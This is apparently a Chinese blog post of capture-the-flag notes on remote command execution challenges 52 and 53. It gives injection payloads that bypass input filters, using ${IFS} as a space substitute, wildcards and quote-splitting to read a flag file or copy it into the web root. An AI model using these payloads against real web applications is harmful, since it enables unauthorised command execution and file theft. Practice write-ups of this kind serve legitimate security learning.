远程命令执行第三天

目录

52

image-20230509205708169

大于号小于号也被过滤但是$符号给放出来了所以可以使用linux的内置环境变量 ${IFS} IFS存储的内部字段分隔符,默认是空格或者制表符。所以可以用这个代替nl命令中的<符号。
经过测试发现网站目录下的flag是假的真的在root根目录
payload=?c=nl${IFS}/fla?||
也可以用拷贝的方式,将新文件命名为txt文件,这样就不会解析了。
?c=cp$IFS/fla?$IFS/var/www/html/a.txt||ls
然后访问网站目录下的a.txt即可获得flag
如果$IFS 不能使用可以考虑 ${IFS}

image-20230509205746830

image-20230509205757080

image-20230509205826851

53

ca’‘t${IFS}fla’'g.php

posted on 2023-05-24 16:38  vaneshadow  阅读(14)  评论(0)    收藏  举报

博客园  ©  2004-2025
浙公网安备 33010602011771号 浙ICP备2021040463号-3